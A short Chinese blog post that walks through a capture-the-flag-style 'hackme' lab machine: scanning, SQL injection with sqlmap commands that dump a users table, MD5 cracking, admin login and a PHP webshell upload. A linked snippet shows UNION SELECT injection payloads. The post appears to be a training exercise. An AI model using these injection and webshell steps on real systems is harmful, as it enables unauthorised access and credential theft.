漏洞打靶(hackme)

于 2024-07-29 16:33:24 发布
阅读量146 收藏
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63988455/article/details/140767767
版权

1.靶机

2.扫描ip端口和目录

3.弱口令登录 没成功

4.发现有个注册 注册上看看

输了个hei 结果密码要六个字符

5.注册好登录

6.搜个书名看看url的变化

试了好几次页面没变化 直接点search

python3 sqlmap.py -r 1.txt --current-db --batch

python3 sqlmap.py -r 1.txt -D webapphacking --tables --batch

python3 sqlmap.py -r 1.txt -D webapphacking -T users --columns --batch

python3 sqlmap.py -r 1.txt -D webapphacking -T users  --dump --batch

去md5解密一下

然后登录superadmin

然后上传一个马

在之前找的uploads目录看看  1.php被上传成功了 那就能getshell了

starhei.zxy
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C语言——飞机打靶游戏
04-15
本代码用C语言撰写,可以使用dev C++等编译器运行。可以使用键盘'a'、's'、'd'、'w' 键进行上下左右移动飞机模型,按空格键发射子弹,击中靶子,系统会自动重新生成靶子,按'q'键结束游戏,显示击中靶子次数。
坦克打靶赛题程序
04-02
设计并制作一个可以寻迹的简易坦克车,并在其上安装由电动机驱动的可以自由旋转的炮塔,在炮塔上安装激光笔以...本题的任务是控制坦克沿靶场中预先设置的轨迹,快速寻迹行进,并同时以光电方式瞄准光靶,实现激光打靶
HACKME-1 打靶
weixin_57315671的博客
06-16 209
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
Hackme1打靶记录
lcc001114的博客
06-12 55
本此靶机主要的工具和靶机都很简单,主要涉及的是SQL注入漏洞和文件上传漏洞。1、sql注入工具:sqlmap2、抓包工具:burpsuite3、webshell后门:kali中的后门4、suid提取:touchmenot提取。
vulnhub靶场-hackme打靶教程
最新发布
weixin_68416970的博客
06-14 528
猜测superadmin用户是管理员,登录一下试试。存在SQL注入,使用sqlmap工具注入后面的。发现靶机IP是192.168.109.132。登录主页发现登录页面,而且还可以注册用户。从响应数据包可以看出来已经上传到文件夹了。创建用户admin,密码123456。使用dirsearch工具扫描目录。创建完成后登录admin用户。设置网络模式为net模式。发现开放了22、80端口。将得到的密码用md5解密。访问目录扫描出来的路径。发现是一个文件上传页面。复制图片链接用蚁剑连接。发现存在文件上传漏洞
hackme-1通关
qq_45747465的博客
06-12 60
打靶 HACKME-1
hackme-1打靶记录
wwd180的博客
06-12 97
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
红队打靶练习:HACKME: 1
分享
12-18 437
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
hackme-2
qq_45747465的博客
06-12 118
打靶--hackme-2
渗透测试No.23 wave信息隐藏 look命令提权 HackSudo-FOG
hljzzj的博客
02-07 475
扫描公众号关注更多打靶文章 靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-fog,697/ 靶场: VulnHub.com 靶机名称: HackSudo-FOG 难度: 简单 发布时间: 2021年5月14日 提示信息: 无 目标: 4个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -sP 192.16..
基于c#语言的打靶程序
11-20
《基于C#语言的打靶程序详解》 在编程领域,C#是一种广泛使用的面向对象的编程语言,尤其在开发Windows应用程序、游戏以及.NET框架下的软件时,C#更是首选。本篇将深入探讨一个基于C#语言编写的打靶程序,通过分析...
坦克循迹打靶
01-21
#include #include #include #include #include #include"1602.h" #include"delay.h" unsigned char second=0;...unsigned int T1C1_Val=4000; //设置初始pwm占空比 60000/10000 ...void GPIO_PinReverse(GPIO_TypeDef*...
matlab打靶环数判定.rar
04-08
在本项目中,我们面临一个基于MATLAB的图像处理任务,目标是实现打靶环数的自动判定。MATLAB是一款强大的数学计算软件,同时也提供了丰富的图像处理工具箱,非常适合进行这种图像分析工作。以下是关于这个课题的一些...
打靶法求解边值问题
05-04
求解线性微分方程边值问题的数值解法有打靶法和有限差分法,有详细的推导过程和MATLAB代码,以及相应的算例实现,并对两种方法进行优劣性比较
C++编写简单的打靶游戏
09-03
在本篇介绍中,我们将探讨如何使用C++编程语言创建一个简单的打靶游戏。这个小游戏主要是为了初学者学习和实践C++以及图形编程基础而设计的。由于作者自称为新手,因此代码可能存在一些错误和不足,但我们可以从中学...
C#递归算法之打靶算法分析
09-02
在本案例中,我们讨论的是“打靶算法”,这是一个基于递归实现的问题,旨在计算在给定次数内达到特定得分的可能性。以下是针对该算法的详细分析: **问题描述:** 假设一个运动员进行射击训练,靶子有10个环,每环...
ddf.rar_vb跌_打靶
09-22
标题中的“ddf.rar_vb跌_打靶法”暗示了这是一个使用Visual Basic(VB)编程语言编写的程序,用于实现一种特定的算法——跌代计算法,并且该算法被应用于模拟打靶的过程。打靶法通常是一种数值计算方法,通过不断...
打靶法MATLAB程序
01-20
MATLAB 打靶法程序设计 打靶法是一种常用的数值求解微分方程的方法,MATLAB 是一个功能强大且广泛应用的计算软件。下面对打靶法 MATLAB 程序的设计进行详细的解释。 程序结构 该程序主要由三个部分组成:1)问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值